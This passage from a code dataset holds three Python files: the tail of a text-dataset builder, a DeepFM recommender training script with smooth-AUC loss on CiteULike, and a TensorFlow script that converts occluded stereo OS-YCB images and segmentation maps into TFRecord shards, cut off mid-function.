\"train.txt\"),\n \"validation\": str(child_dataset_dir / \"validation.txt\"),\n \"test\": str(child_dataset_dir / \"test.txt\"),\n }\n\n pipeline_config.dataset.path.update(path_dict)\n OmegaConf.save(pipeline_config, pipeline_config_path)\n\n train.to_csv(pipeline_config.dataset.path.train, sep=\"\\t\", index=False)\n validation.to_csv(pipeline_config.dataset.path.validation, sep=\"\\t\", index=False)\n test.to_csv(pipeline_config.dataset.path.test, sep=\"\\t\", index=False)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--dataset\", type=str, default=\"nsmc\", choices=[\"nsmc\", \"trec6\"]\n )\n parser.add_argument(\"--pipeline\", type=str, default=\"pv00\")\n parser.add_argument(\"--valid_ratio\", type=float, default=0.1)\n parser.add_argument(\"--seed\", type=int, default=42)\n args = parser.parse_args()\n main(args)\n","repo_name":"HephaestusProject/pytorch-Sencnn","sub_path":"build_dataset.py","file_name":"build_dataset.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"71161482132","text":"import logging\nimport random\nfrom time import time\nfrom datetime import datetime\nimport pandas as pd\nimport torch\nimport nni\nimport sys\nfrom tensorflow.keras.callbacks import EarlyStopping\nimport os\nsys.path.append(\"..\")\nfrom utils import logCof\n# from models import MF, SmoothAUCLoss, BPR\nfrom deepctr_torch.inputs import SparseFeat, DenseFeat, get_feature_names\nfrom deepctr_torch.models import DeepFM\n\n\ncurrent_time = datetime.now().strftime('%Y%m%d%H%M%S')\n\n\ndef main(args):\n # items_data = pd.read_csv(os.path.join(args[\"datadir\"], \"items_info.csv\"))\n\n torch.manual_seed(args[\"seed\"])\n random.seed(args[\"seed\"])\n torch.cuda.manual_seed(args[\"seed\"])\n\n sparse_features = {\"userInt\": 5560, \"newsInt\": 17000}\n # dense_features = [str(x) for x in range(100)]\n dense_features = []\n\n fixlen_feature_columns = [SparseFeat(feat, sparse_features[feat], embedding_dim=args[\"embedding_dim\"]) for feat in sparse_features] \\\n + [DenseFeat(feat, 1, ) for feat in dense_features]\n linear_feature_columns = fixlen_feature_columns\n dnn_feature_columns = fixlen_feature_columns\n\n feature_names = get_feature_names(linear_feature_columns + dnn_feature_columns)\n\n model = DeepFM(linear_feature_columns=linear_feature_columns,\n dnn_feature_columns=dnn_feature_columns,\n lr=args[\"lr\"],\n l2_reg_embedding=args[\"l2_reg_embedding\"],\n l2_reg_dnn=args[\"l2_reg_dnn\"],\n 
device=device,\n dnn_hidden_units=(args[\"layer_size1\"], args[\"layer_size2\"]), #\n # dnn_hidden_units=(), #\n dnn_dropout=args[\"dropout\"],\n dnn_use_bn=True\n )\n model.compile(\"adam\", 'smooth_auc_loss',\n metrics=[\"binary_crossentropy\", 'auc_personal'])\n\n if not args[\"only_test\"]:\n\n train_data = pd.read_csv(os.path.join(args[\"datadir\"], \"train_data1.csv\"))\n val_data = pd.read_csv(os.path.join(args[\"datadir\"], \"val_data.csv\"))\n train3 = pd.read_pickle(os.path.join(args[\"datadir\"], \"train3.pickle\"))[\"train_data3_user_list\"]\n train_data.columns = [\"userInt\", \"newsInt\", \"label\"]\n val_data.columns = [\"userInt\", \"newsInt\", \"label\"]\n\n callback = EarlyStopping(monitor=\"val_auc_personal\", patience=10, verbose=1, mode=\"max\")\n print(\"***************************** 开始训练 ******************************\")\n history, best_val_score, best_model_params = model.fit_SAUC(logger, train3, train_data[[name for name in feature_names] + [\"label\"]],\n batch_size=args[\"batch_size\"], epochs=args[\"epochs\"], verbose=1,\n validation_data=[{name: val_data.drop(columns=[\"label\"])[name] for name in feature_names}, val_data.label.values],\n callbacks=[callback],\n shuffle=True, tau=args[\"tau\"])\n nni.report_final_result(best_val_score)\n # save model\n dirname = os.path.dirname(os.path.abspath(args[\"model_path\"]))\n os.makedirs(dirname, exist_ok=True)\n model_name = args[\"project_name\"] + \"_\" + current_time + \"_tau_\" + str(args[\"tau\"]) + \"_\" + str(best_val_score)[:8] + \".pt\"\n torch.save(best_model_params, os.path.join(dirname, model_name))\n print(\"***************************** testing ******************************\")\n test_data = pd.read_csv(os.path.join(args[\"datadir\"], \"test_data.csv\"))\n test_data.columns = [\"userInt\", \"newsInt\", \"label\"]\n eval_result = model.test_personal({name: test_data.drop(columns=[\"label\"])[name] for name in feature_names}, test_data.label.values)\n for name, values in eval_result.items():\n print(name, values)\n else:\n test_model_name = \"CiteULike_SAUC_20220927173548_tau_0.02_0.900003.pt\"\n test_data = pd.read_csv(os.path.join(args[\"datadir\"], \"test_data.csv\"))\n test_data.columns = [\"userInt\", \"newsInt\", \"label\"]\n model_dict = model.load_state_dict(torch.load(os.path.join(\"../saved_models\", test_model_name)))\n print(\"test on model: \", test_model_name)\n eval_result = model.test_personal({name: test_data.drop(columns=[\"label\"])[name] for name in feature_names}, test_data.label.values)\n for name, values in eval_result.items():\n print(name, values)\n\n\ndef get_default_parameters():\n # 要调参的参数\n params = \\\n {\n \"lr\": 0.02,\n \"dropout\": 0.35,\n \"embedding_dim\": 8,\n \"layer_size1\": 32,\n \"layer_size2\": 8,\n \"batch_size\": 1000,\n \"l2_reg_embedding\": 0.0001,\n \"l2_reg_dnn\": 0.00001,\n \"tau\": 0.02\n }\n return params\n\n\nif __name__ == '__main__':\n # 一些默认参数\n params = \\\n {\n \"current_time\": current_time,\n \"project_name\": \"CiteULike_SAUC\",\n \"datadir\": \"../Datasets/CiteULike/\",\n \"dataset\": 'CiteULike',\n \"seed\": 0,\n \"cuda\": 2,\n \"tau\": 0.1,\n # train\n \"lr\": 0.005,\n \"dropout\": 0.9,\n \"batch_size\": 2000,\n \"epochs\": 3000,\n # save\n \"model_path\": \"../saved_models/xxx.pt\",\n # test\n \"only_test\": True\n }\n\n device = \"cpu\"\n use_cuda = True\n if use_cuda and torch.cuda.is_available():\n print(\"cuda ready...\")\n device = \"cuda:\" + str(params[\"cuda\"])\n\n logger = logging.getLogger(params[\"project_name\"])\n try:\n # get 
parameters form tuner\n tuner_params = nni.get_next_parameter()\n params.update(get_default_parameters())\n params.update(tuner_params)\n log_file_name = params[\"project_name\"] + \"_\" + current_time + \".log\"\n logger = logCof(logger, \"../log/\", log_file_name)\n logger.info(params)\n main(params)\n except Exception as exception:\n logger.exception(exception)\n raise\n","repo_name":"hannanhtang/sauc","sub_path":"run_with_CiteULike/DeepFM_SAUC.py","file_name":"DeepFM_SAUC.py","file_ext":"py","file_size_in_byte":6134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9171855273","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom datetime import datetime\nimport os\nimport random\nimport sys\nimport threading\nimport errno\n\n\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\n\n\n# custom functions\n# -----\n\n\nOSYCB_ENCODING = np.array(['NULL_CLASS', '072-a_toy_airplane', '065-g_cups',\n '063-b_marbles', '027_skillet', '036_wood_block',\n '013_apple', '073-e_lego_duplo',\n '028_skillet_lid', '017_orange',\n '070-b_colored_wood_blocks', '015_peach',\n '048_hammer', '063-a_marbles', '073-b_lego_duplo',\n '035_power_drill', '054_softball',\n '012_strawberry', '065-b_cups',\n '072-c_toy_airplane', '062_dice',\n '040_large_marker', '044_flat_screwdriver',\n '037_scissors', '011_banana', '009_gelatin_box',\n '014_lemon', '016_pear', '022_windex_bottle',\n '065-c_cups', '072-d_toy_airplane',\n '073-a_lego_duplo', '065-e_cups',\n '003_cracker_box', '065-f_cups',\n '070-a_colored_wood_blocks', '073-g_lego_duplo',\n '033_spatula', '043_phillips_screwdriver',\n '055_baseball', '073-d_lego_duplo', '029_plate',\n '052_extra_large_clamp', '021_bleach_cleanser',\n '065-a_cups', '019_pitcher_base', '018_plum',\n '065-h_cups', '065-j_cups', '065-d_cups',\n '025_mug', '032_knife', '065-i_cups',\n '026_sponge', '071_nine_hole_peg_test',\n '004_sugar_box', '056_tennis_ball',\n '038_padlock', '053_mini_soccer_ball',\n '059_chain', '061_foam_brick', '058_golf_ball',\n '006_mustard_bottle', '073-f_lego_duplo',\n '031_spoon', '051_large_clamp',\n '072-b_toy_airplane', '050_medium_clamp',\n '072-e_toy_airplane', '042_adjustable_wrench',\n '010_potted_meat_can', '024_bowl',\n '073-c_lego_duplo', '007_tuna_fish_can',\n '008_pudding_box', '057_racquetball',\n '030_fork', '002_master_chef_can',\n '077_rubiks_cube', '005_tomato_soup_can'])\n\ntf.app.flags.DEFINE_string('train_directory', './',\n 'Training data directory')\ntf.app.flags.DEFINE_string('validation_directory', './',\n 'Validation data directory')\n\n\ntf.app.flags.DEFINE_string('input_directory',\n '/home/aecgroup/aecdata/Results_python/markus/OS-YCB/YCB_database2/',\n 'where the image data is actually stored')\ntf.app.flags.DEFINE_string('pdstruct_file', '/home/aecgroup/aecdata/Textures/occluded/datasets/osycb/dataframes/OSYCB_2occ_allperc_combined.gzip',\n 'Pandas Dataframe Pickle file')\n\n# directories for the differentiable data\n# '/home/aecgroup/aecdata/Textures/occluded/datasets/osycb/dataframes/OSYCB_2occ_allperc_combined.gzip''\n\n# '/home/aecgroup/aecdata/Results_python/markus/OS-YCB/YCB_database2/dataframes/2occ/20p/YCBdb2_2occ_20p_usample1000_downsampled4.gzip'\n# '/home/aecgroup/aecdata/Results_python/markus/OS-YCB/YCB_database2/dataframes/2occ/40p/YCBdb2_2occ_40p_usample1000_downsampled4.gzip'\n# 
'/home/aecgroup/aecdata/Results_python/markus/OS-YCB/YCB_database2/dataframes/2occ/60p/YCBdb2_2occ_60p_usample1000_downsampled4.gzip'\n# '/home/aecgroup/aecdata/Results_python/markus/OS-YCB/YCB_database2/dataframes/2occ/80p/YCBdb2_2occ_80p_usample1000_downsampled4.gzip'\n\n# '/home/aecgroup/aecdata/Results_python/markus/OS-YCB/YCB_database2/dataframes/2occ/20p/YCBdb2_2occ_20p_usample1000.gzip'\n# '/home/aecgroup/aecdata/Results_python/markus/OS-YCB/YCB_database2/dataframes/2occ/40p/YCBdb2_2occ_40p_usample1000.gzip'\n# '/home/aecgroup/aecdata/Results_python/markus/OS-YCB/YCB_database2/dataframes/2occ/60p/YCBdb2_2occ_60p_usample1000.gzip'\n# '/home/aecgroup/aecdata/Results_python/markus/OS-YCB/YCB_database2/dataframes/2occ/80p/YCBdb2_2occ_80p_usample1000.gzip'\n\n\ntf.app.flags.DEFINE_string('output_directory',\n '/home/aecgroup/aecdata/Textures/occluded/datasets/osycb/',\n 'where the tfrecord files will be stored')\n\n\n\n\ntf.app.flags.DEFINE_string(\n 'name_modifier', 'ds4', 'string that gets attached to the filename of the tfrecord-files for better discrimination')\n\n\ntf.app.flags.DEFINE_integer('train_shards', 10,\n 'Number of shards in training TFRecord files.')\ntf.app.flags.DEFINE_integer('validation_shards', 0,\n 'Number of shards in validation TFRecord files.')\n\ntf.app.flags.DEFINE_integer('num_threads', 10,\n 'Number of threads to preprocess the images.')\n\ntf.app.flags.DEFINE_integer('object_distance', 50,\n 'Distance from the camera to the object shown in the image')\n\ntf.app.flags.DEFINE_boolean('export', False,\n 'export to jpeg files')\ntf.app.flags.DEFINE_boolean('central_crop', False,\n 'central crop of the image')\ntf.app.flags.DEFINE_boolean('random_crop', False,\n'random crop of central crop of the image, target visible')\n\nFLAGS = tf.app.flags.FLAGS\n\n\ndef _int64_feature(value):\n \"\"\"Wrapper for inserting int64 features into Example proto.\"\"\"\n if not isinstance(value, list):\n value = [value]\n return tf.train.Feature(int64_list=tf.train.Int64List(value=value))\n\n\ndef _bytes_feature(value):\n \"\"\"Wrapper for inserting bytes features into Example proto.\"\"\"\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n# TODO modify input of function to include other class-lists, maybe duplicate\n\ndef mkdir_p(path):\n \"\"\"\n mkdir_p takes a string path and creates a directory at this path if it\n does not already exist.\n \"\"\"\n try:\n os.makedirs(path)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise\n\n\ndef _write_to_file(img_enc_left, img_enc_right, label, count):\n mkdir_p(FLAGS.output_directory + \"/export/left/label_{}/\".format(label))\n mkdir_p(FLAGS.output_directory + \"/export/right/label_{}/\".format(label))\n\n f = open(FLAGS.output_directory + \"/export/left/label_{}/{}.jpeg\".format(label, count), \"wb+\")\n f.write(img_enc_left)\n f.close()\n f = open(FLAGS.output_directory + \"/export/right/label_{}/{}.jpeg\".format(label, count), \"wb+\")\n f.write(img_enc_right)\n f.close()\n\ndef _convert_to_example(filename_l, image_buffer_l, filename_r, image_buffer_r, label, text, occ1_text, occ2_text, occ3_text, occ1_label, occ2_label, occ3_label, height, width):\n \"\"\"Build an Example proto for an example.\n\n Args:\n filename: string, path to an image file, e.g., '/path/to/example.JPG'\n image_buffer: string, JPEG encoding of RGB image\n label: integer, identifier for the ground truth for the network\n text: string, unique human-readable, e.g. 
'dog'\n height: integer, image height in pixels\n width: integer, image width in pixels\n Returns:\n Example proto\n \"\"\"\n\n colorspace = 'RGB'\n channels = 3\n image_format = 'JPEG'\n\n example = tf.train.Example(features=tf.train.Features(feature={\n 'image/height': _int64_feature(height),\n 'image/width': _int64_feature(width),\n 'image/colorspace': _bytes_feature(tf.compat.as_bytes(colorspace)),\n 'image/channels': _int64_feature(channels),\n 'image/class/label': _int64_feature(label),\n 'image/class/text': _bytes_feature(tf.compat.as_bytes(text)),\n\n 'image/class/occ1_label': _int64_feature(occ1_label),\n 'image/class/occ1_text': _bytes_feature(tf.compat.as_bytes(occ1_text)),\n 'image/class/occ2_label': _int64_feature(occ2_label),\n 'image/class/occ2_text': _bytes_feature(tf.compat.as_bytes(occ2_text)),\n 'image/class/occ3_label': _int64_feature(occ3_label),\n 'image/class/occ3_text': _bytes_feature(tf.compat.as_bytes(occ3_text)),\n # TODO: Add different classes that are only present in the pd datastruct\n # such as occlusion, eye_occlusion, eye_position etc.\n 'image/format': _bytes_feature(tf.compat.as_bytes(image_format)),\n 'image/left/filename': _bytes_feature(tf.compat.as_bytes(os.path.basename(filename_l))),\n 'image/left/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer_l)),\n 'image/right/filename': _bytes_feature(tf.compat.as_bytes(os.path.basename(filename_r))),\n 'image/right/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer_r))}))\n return example\n\n\n#TODO replace the _convert_example function with this:\ndef make_tf_example(image_string_left, image_string_right, labels,\n occlusion_percentage_left, occlusion_percentage_right,\n segmentation_string_left, segmentation_string_right):\n \"\"\" Make tf-examples from image strings and labels\"\"\"\n feature_dict = \\\n {'image_left': tf.train.Feature(\n bytes_list=tf.train.BytesList(value=[image_string_left])),\n 'image_right': tf.train.Feature(\n bytes_list=tf.train.BytesList(value=[image_string_right])),\n 'occlusion_left': tf.train.Feature(\n float_list=tf.train.FloatList(value=[occlusion_percentage_left])),\n 'occlusion_right': tf.train.Feature(\n float_list=tf.train.FloatList(value=[occlusion_percentage_right])),\n 'occlusion_avg': tf.train.Feature(\n float_list=tf.train.FloatList(value=[\n (occlusion_percentage_left + occlusion_percentage_right)/2])),\n 'segmap_left': tf.train.Feature(\n bytes_list=tf.train.BytesList(value=[segmentation_string_left])),\n 'segmap_right': tf.train.Feature(\n bytes_list=tf.train.BytesList(value=[segmentation_string_right]))\n }\n\n for i in range(len(labels)):\n feature_dict['label{}'.format(i+1)] = \\\n tf.train.Feature(int64_list=tf.train.Int64List(value=[labels[i]]))\n\n return tf.train.Example(features=tf.train.Features(feature=feature_dict))\n\nclass ImageCoder(object):\n \"\"\"Helper class that provides TensorFlow image coding utilities.\"\"\"\n\n def __init__(self):\n # Create a single Session to run all image coding calls.\n self._sess = tf.Session()\n\n # Initializes function that converts PNG to JPEG data.\n self._png_data = tf.placeholder(dtype=tf.string)\n image = tf.image.decode_png(self._png_data, channels=3)\n self._png_to_jpeg = tf.image.encode_jpeg(\n image, format='rgb', quality=100)\n\n # Initializes function that decodes RGB JPEG data.\n self._decode_jpeg_data = tf.placeholder(dtype=tf.string)\n self._decode_jpeg = tf.image.decode_jpeg(\n self._decode_jpeg_data, channels=3)\n\n # Initializes function that converts rgb to grayscale\n self._jpeg_data = 
tf.placeholder(dtype=tf.string)\n image_j = tf.image.rgb_to_grayscale(\n tf.image.decode_jpeg(self._jpeg_data, channels=3))\n self._rgb_to_grayscale = tf.image.encode_jpeg(\n image_j, format='grayscale', quality=100)\n\n\n self._crop_data = tf.placeholder(dtype=tf.string)\n image_decoded = tf.image.decode_jpeg(self._crop_data, channels=3)\n self.cropped = tf.image.encode_jpeg(tf.image.resize_with_crop_or_pad(\n image_decoded,\n 32, 32), format='rgb', quality=100)\n \n \n self.random_cropped = tf.image.encode_jpeg(tf.image.random_crop(\n tf.image.resize_with_crop_or_pad(\n image_decoded,\n 56, 56)\n , size = [32, 32, 3]), format='rgb', quality=100)\n\n self._encode_jpeg_data = tf.placeholder(dtype=tf.uint8)\n self._encode_jpeg = tf.image.encode_jpeg(\n self._encode_jpeg_data, format='rgb', quality=100)\n\n self._encode_png_data = tf.placeholder(dtype=tf.uint8)\n self._encode_png = tf.image.encode_png(\n self._encode_png_data)\n\n def central_crop(self, image_data, target_height, target_width):\n image = self._sess.run(self.cropped,\n feed_dict={self._crop_data: image_data})\n return image\n \n def random_crop(self, image_data, target_height, target_width):\n \"TODO: Make this work properly\"\n image = self._sess.run(self.random_cropped,\n feed_dict={self._crop_data: image_data})\n return image\n\n def encode_jpeg(self, array):\n # Initializes function that converts rgb to grayscale\n image = self._sess.run(self._encode_jpeg,\n feed_dict={self._encode_jpeg_data: array})\n\n return image\n\n def encode_png(self, array):\n # Initializes function that converts rgb to grayscale\n image = self._sess.run(self._encode_png,\n feed_dict={self._encode_png_data: array})\n\n return image\n\n def png_to_jpeg(self, image_data):\n return self._sess.run(self._png_to_jpeg,\n feed_dict={self._png_data: image_data})\n\n def decode_jpeg(self, image_data):\n image = self._sess.run(self._decode_jpeg,\n feed_dict={self._decode_jpeg_data: image_data})\n assert len(image.shape) == 3\n assert image.shape[2] == 3\n return image\n\n def rgb_to_grayscale(self, imagedata):\n imagedata = self._sess.run(self._rgb_to_grayscale,\n feed_dict={self._jpeg_data: image_data})\n return imagedata\n\n\ndef _is_png(filename):\n \"\"\"Determine if a file contains a PNG format image.\n\n Args:\n filename: string, path of the image file.\n\n Returns:\n boolean indicating if the image is a PNG.\n \"\"\"\n return '.png' in filename\n\n\ndef _process_image(filename, coder):\n \"\"\"Process a single image file.\n\n Args:\n filename: string, path to an image file e.g., '/path/to/example.JPG'.\n coder: instance of ImageCoder to provide TensorFlow image coding utils.\n Returns:\n image_buffer: string, JPEG encoding of RGB image.\n height: integer, image height in pixels.\n width: integer, image width in pixels.\n \"\"\"\n # Read the image file.\n with tf.gfile.FastGFile(filename, 'rb') as f:\n image_data = f.read()\n\n # Convert any PNG to JPEG's for consistency.\n if _is_png(filename):\n print('Converting PNG to JPEG for %s' % filename)\n image_data = coder.png_to_jpeg(image_data)\n\n # Decode the RGB JPEG.\n image = coder.decode_jpeg(image_data)\n\n # Check that image converted to RGB\n assert len(image.shape) == 3\n height = image.shape[0]\n width = image.shape[1]\n assert image.shape[2] == 3\n\n if FLAGS.central_crop:\n image_data = coder.central_crop(image_data, width//10*4, width//10*4)\n if FLAGS.random_crop:\n image_data = coder.random_crop(image_data, width//10*4, width//10*4)\n return image_data, height, width\n\n# TODO: this needs 
to have additional inputs, too.\n\n\ndef _process_segmentation_map(filename_l, height, width, coder):\n from PIL import Image\n import numpy as np\n from scipy.misc import imresize\n import matplotlib.pyplot as plt\n\n segmentation_file = filename_l.rsplit('_left', 1)[0]+'.npz'\n segmaps = np.load(segmentation_file)\n\n segmap_l = segmaps['segmentation_left']\n segmap_r = segmaps['segmentation_right']\n\n segmap_l = imresize(segmap_l, size=(height, width))\n segmap_r = imresize(segmap_r, size=(height, width))\n bin_segmap_l = np.array(segmap_l > 0, dtype=int)\n bin_segmap_r = np.array(segmap_r > 0, dtype=int)\n\n\n # construct binary maps\n bin_segmap_l[:, :, 0] = bin_segmap_l[:, :, 0] - \\\n bin_segmap_l[:, :, 1] - bin_segmap_l[:, :, 2]\n bin_segmap_l[:, :, 1] = bin_segmap_l[:, :, 1] - bin_segmap_l[:, :, 2]\n\n bin_segmap_r[:, :, 0] = bin_segmap_r[:, :, 0] - \\\n bin_segmap_r[:, :, 1] - bin_segmap_r[:, :, 2]\n bin_segmap_r[:, :, 1] = bin_segmap_r[:, :, 1] - bin_segmap_r[:, :, 2]\n\n segmap_l = np.multiply(bin_segmap_l, np.array(segmap_l > 0, dtype=int)*255)\n segmap_r = np.multiply(bin_segmap_r, np.array(segmap_r > 0, dtype=int)*255)\n\n jpeg_left = coder.encode_jpeg(segmap_l)\n jpeg_right = coder.encode_jpeg(segmap_r)\n #\n # jpeg_left = coder.encode_png(segmap_l)\n # jpeg_right = coder.encode_png(segmap_r)\n\n if FLAGS.central_crop:\n segmap_l = coder.central_crop(jpeg_left, width//10*4, width//10*4)\n segmap_r = coder.central_crop(jpeg_right, width//10*4, width//10*4)\n return segmap_l, segmap_r, height/10*4, width/10*4\n if FLAGS.random_crop:\n segmap_l = coder.random_crop(jpeg_left, width//10*4, width//10*4)\n segmap_r = coder.random_crop(jpeg_right, width//10*4, width//10*4)\n return segmap_l, segmap_r, height/10*4, width/10*4\n else:\n return segmap_l, segmap_r, height, width\n\n\ndef _process_image_files_batch(coder, thread_index, ranges, name, filenames,\n texts, labels, occ_texts, occ_labels, occ_percs, num_shards):\n \"\"\"Processes and saves list of images as TFRecord in 1 thread.\n\n Args:\n coder: instance of ImageCoder to provide TensorFlow image coding utils.\n thread_index: integer, unique batch to run index is within [0, len(ranges)).\n ranges: list of pairs of integers specifying ranges of each batches to\n analyze in parallel.\n name: string, unique identifier specifying the data set\n filenames: list of strings; each string is a path to an image file\n texts: list of strings; each string is human readable, e.g. 'dog'\n labels: list of integer; each integer identifies the ground truth\n num_shards: integer number of shards for this data set.\n \"\"\"\n # Each thread produces N shards where N = int(num_shards / num_threads).\n # For instance, if num_shards = 128, and the num_threads = 2, then the first\n # thread would produce shards [0, 64).\n num_threads = len(ranges)\n assert not num_shards % num_threads\n num_shards_per_batch = int(num_shards / num_threads)\n\n shard_ranges = np.linspace(ranges[thread_index][0],\n ranges[thread_index][1],\n num_shards_per_batch + 1).astype(int)\n num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]\n\n counter = 0\n for s in range(num_shards_per_batch):\n # Generate a sharded version of the file name, e.g. 
'train-00002-of-00010'\n shard = thread_index * num_shards_per_batch + s\n output_filename = '%s-%.5d-of-%.5d.tfrecord' % (\n name, shard, num_shards)\n output_file = os.path.join(FLAGS.output_directory, output_filename)\n writer = tf.python_io.TFRecordWriter(output_file)\n\n shard_counter = 0\n files_in_shard = np.arange(\n shard_ranges[s], shard_ranges[s + 1], dtype=int)\n for i in files_in_shard:\n filename_l = filenames[0][i]\n filename_r = filenames[1][i]\n label = labels[i]\n text = texts[i]\n occ1_text = occ_texts[0][i]\n occ2_text = occ_texts[1][i]\n occ3_text = occ_texts[2][i]\n occ1_label = occ_labels[0][i]\n occ2_label = occ_labels[1][i]\n occ3_label = occ_labels[2][i]\n occ_left = occ_percs[0][i]\n occ_right = occ_percs[1][i]\n occ_avg = occ_percs[2][i]\n\n image_buffer_l, height, width = _process_image(filename_l, coder)\n image_buffer_r, _, _ = _process_image(filename_r, coder)\n\n if FLAGS.export:\n _write_to_file(image_buffer_l, image_buffer_r, label, counter)\n else:\n # process segmentation_maps\n seg_buffer_l, seg_buffer_r, height, width = _process_segmentation_map(filename_l, height, width, coder)\n\n #example = _convert_to_example(filename_l, image_buffer_l, filename_r, image_buffer_r, label,\n # text, occ1_text, occ2_text, occ3_text, occ1_label, occ2_label, occ3_label, height, width)\n example = make_tf_example(image_buffer_l, image_buffer_r, (label, occ1_label, occ2_label, occ3_label), occ_left, occ_right, seg_buffer_l, seg_buffer_r)\n writer.write(example.SerializeToString())\n shard_counter += 1\n counter += 1\n\n if not counter % 1000:\n print('%s [thread %d]: Processed %d of %d images in thread batch.' %\n (datetime.now(), thread_index, counter, num_files_in_thread))\n sys.stdout.flush()\n\n writer.close()\n print('%s [thread %d]: Wrote %d images to %s' %\n (datetime.now(), thread_index, shard_counter, output_file))\n sys.stdout.flush()\n shard_counter = 0\n print('%s [thread %d]: Wrote %d images to %d shards.' %\n (datetime.now(), thread_index, counter, num_files_in_thread))\n sys.stdout.flush()\n\n\ndef _process_image_files(name, filenames, texts, labels, occ_texts, occ_labels, occ_percs, num_shards):\n \"\"\"Process and save list of images as TFRecord of Example protos.\n\n Args:\n name: string, unique identifier specifying the data set\n filenames: list of strings; each string is a path to an image file\n texts: list of strings; each string is human readable, e.g. 
'dog'\n labels: list of integer; each integer identifies the ground truth\n num_shards: integer number of shards for this data set.\n \"\"\"\n assert len(filenames[0]) == len(texts)\n assert len(filenames[0]) == len(labels)\n\n # Break all images into batches with a [ranges[i][0], ranges[i][1]].\n spacing = np.linspace(\n 0, len(filenames[0]), FLAGS.num_threads + 1).astype(np.int)\n ranges = []\n for i in range(len(spacing) - 1):\n ranges.append([spacing[i], spacing[i + 1]])\n\n # Launch a thread for each batch.\n print('Launching %d threads for spacings: %s' %\n (FLAGS.num_threads, ranges))\n sys.stdout.flush()\n\n # Create a mechanism for monitoring when all threads are finished.\n coord = tf.train.Coordinator()\n\n # Create a generic TensorFlow-based utility for converting all image codings.\n coder = ImageCoder()\n\n threads = []\n for thread_index in range(len(ranges)):\n args = (coder, thread_index, ranges, name, filenames,\n texts, labels, occ_texts, occ_labels, occ_percs, num_shards)\n t = threading.Thread(target=_process_image_files_batch, args=args)\n t.start()\n threads.append(t)\n\n # Wait for all the threads to terminate.\n coord.join(threads)\n print('%s: Finished writing all %d images in data set.' %\n (datetime.now(), len(filenames[0])))\n sys.stdout.flush()\n\ndef _find_image_files_in_struct(pdDataFrameDir, distance):\n # get the information instead from the datastruct\n pdDataFrame = pd.read_pickle(pdDataFrameDir)\n\n # make selection of what you actually want to extract -> fine pictures\n pdDataFrame_l = pdDataFrame[pdDataFrame.scale ==\n 'fine'][pdDataFrame.eye == 'left']\n pdDataFrame_r = pdDataFrame[pdDataFrame.scale ==\n 'fine'][pdDataFrame.eye == 'right']\n\n filenames_l = pdDataFrame_l.filepath.values.tolist()\n filenames_r = pdDataFrame_r.filepath.values.tolist()\n texts = pdDataFrame_l.object_in_focus.values\n occ1_texts = pdDataFrame_l.first_occluder.values\n occ2_texts = pdDataFrame_l.second_occluder.values\n occ3_texts = pdDataFrame_l.third_occluder.values\n\n occs_avg = pdDataFrame_l.occlusion.values\n occs_left = pdDataFrame_l.occlusion_left.values\n occs_right = pdDataFrame_l.occlusion_right.values\n\n # # labels of focussed object\n # unique_labels = pdDataFrame_l.object_in_focus.unique().tolist()\n # labels = []\n # # Leave label index 0 empty as a background class.\n # label_index = 1\n # for text in unique_labels:\n # labels.extend([label_index] * texts[texts == text].shape[0])\n # label_index += 1\n #\n # insert any sorting you want (important for comparison)\n unique_labels = OSYCB_ENCODING[1:] # OSYCB_ENCODING[0] is NULLCLASS\n labels = np.zeros_like(texts)\n occ1_labels = np.zeros_like(occ1_texts)\n occ2_labels = np.zeros_like(occ2_texts)\n occ3_labels = np.zeros_like(occ3_texts)\n # Leave label index 0 empty as a background class.\n label_index = 1\n for text in unique_labels:\n labels[np.where(texts == 'G' + text)[0]] = label_index\n\n occ1_labels[np.where(occ1_texts == 'G' + text)[0]] = label_index\n occ2_labels[np.where(occ2_texts == 'G' + text)[0]] = label_index\n occ3_labels[np.where(occ3_texts == 'G' + text)[0]] = label_index\n label_index += 1\n\n # remap the texts arrays to a list\n texts = texts.tolist()\n occ1_texts = occ1_texts.tolist()\n occ2_texts = occ2_texts.tolist()\n occ3_texts = occ3_texts.tolist()\n\n labels = labels.tolist()\n occ1_labels = occ1_labels.tolist()\n occ2_labels = occ2_labels.tolist()\n occ3_labels = occ3_labels.tolist()\n\n occs_avg = occs_avg.tolist()\n occs_left = occs_left.tolist()\n occs_right = 
occs_right.tolist()\n\n # Shuffle the ordering of all image files in order to guarantee\n # random ordering of the images with respect to label in the\n # saved TFRecord files. Make the randomization repeatable.\n shuffled_index = list(range(len(filenames_l)))\n random.seed(12345)\n random.shuffle(shuffled_index)\n\n filenames_l = [filenames_l[i] for i in shuffled_index]\n filenames_r = [filenames_r[i] for i in shuffled_index]\n\n occ1_texts = [occ1_texts[i] for i in shuffled_index]\n occ2_texts = [occ2_texts[i] for i in shuffled_index]\n occ3_texts = [occ3_texts[i] for i in shuffled_index]\n texts = [texts[i] for i in shuffled_index]\n\n occ1_labels = [occ1_labels[i] for i in shuffled_index]\n occ2_labels = [occ2_labels[i] for i in shuffled_index]\n occ3_labels = [occ3_labels[i] for i in shuffled_index]\n labels = [labels[i] for i in shuffled_index]\n\n occs_avg = [occs_avg[i] for i in shuffled_index]\n occs_left = [occs_left[i] for i in shuffled_index]\n occs_right = [occs_right[i] for i in shuffled_index]\n\n print('Found %d JPEG files across %d labels.' %\n (len(filenames_l), len(unique_labels)))\n\n # workaround to cleanup filenames\n filenames_l = [FLAGS.input_directory + filename.split('/', 7)[-1] for filename in filenames_l]\n filenames_r = [FLAGS.input_directory + filename.split('/', 7)[-1] for filename in filenames_r]\n\n # store some variables in tuples\n occ_texts = (occ1_texts, occ2_texts, occ3_texts)\n occ_labels = (occ1_labels, occ2_labels, occ3_labels)\n filenames = (filenames_l, filenames_r)\n occ_percs = (occs_left, occs_right, occs_avg)\n return filenames, texts, labels, occ_texts, occ_labels, occ_percs\n\n\ndef 